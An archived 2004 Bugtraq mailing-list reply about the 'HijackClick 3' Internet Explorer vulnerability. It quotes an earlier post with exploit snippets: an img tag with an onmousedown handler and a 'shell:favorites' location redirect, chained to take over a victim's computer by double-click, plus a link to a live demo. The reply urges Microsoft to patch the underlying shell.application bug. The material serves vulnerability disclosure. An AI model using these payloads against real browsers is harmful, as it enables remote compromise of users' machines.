Bugtraq mailing list archives

RE: Re: HijackClick 3


From: "Drew Copley" <dcopley () eEye com>
Date: Mon, 12 Jul 2004 15:11:48 -0700

 

-----Original Message-----
From: http-equiv () excite com [mailto:1 () malware com] 
Sent: Monday, July 12, 2004 12:06 PM
To: bugtraq () securityfocus com
Cc: NTBugtraq () listserv ntbugtraq com
Subject: Re: HijackClick 3


<snip>

This is absolutely fantastic Paul, with a patented double-click 
of the mouse we can remotely take over the target's computer:

Just substitute as follows:

1. <img src="greyhat.html" id=anch 
onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height=
2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert
()',3000);" style="width=168px;height=152px;background-image:url
('youlickit.gif');cursor:hand" title="click me!"></a>

2. location="shell:favorites\\greyhat[1].htm"

Someone was querying the other day whether shell in Internet 
Explorer poses a problem [despite repeated demonstrations]. 
Pah ! Probably not.

Quick and Dirty Working Demo:

http://www.malware.com/paul.html

Just to add... this, too, works on using shell.application,
a bug which has been open for around ten months. 

In fact, I don't think there has been a bug in about ten
months (coincidentally) that does not rely on either Jelmer's
adodb bug or your shell.application bug.

Microsoft can remove the threat from all users right now, today,
and issue a fix. We won't see criminals using these things
to grab people's money tommorrow. We won't see hundreds of articles
critical of their browser. We won't see devious, targetted
attacks on bank employees or anyone else.

Remove the escalating security holes, and you remove the
ones that depend on it. They then might only serve some use
for phishers and the like, people who are only minorly more
successful using such exploits over using straight cons.

 

-- 
http://www.malware.com






Current thread: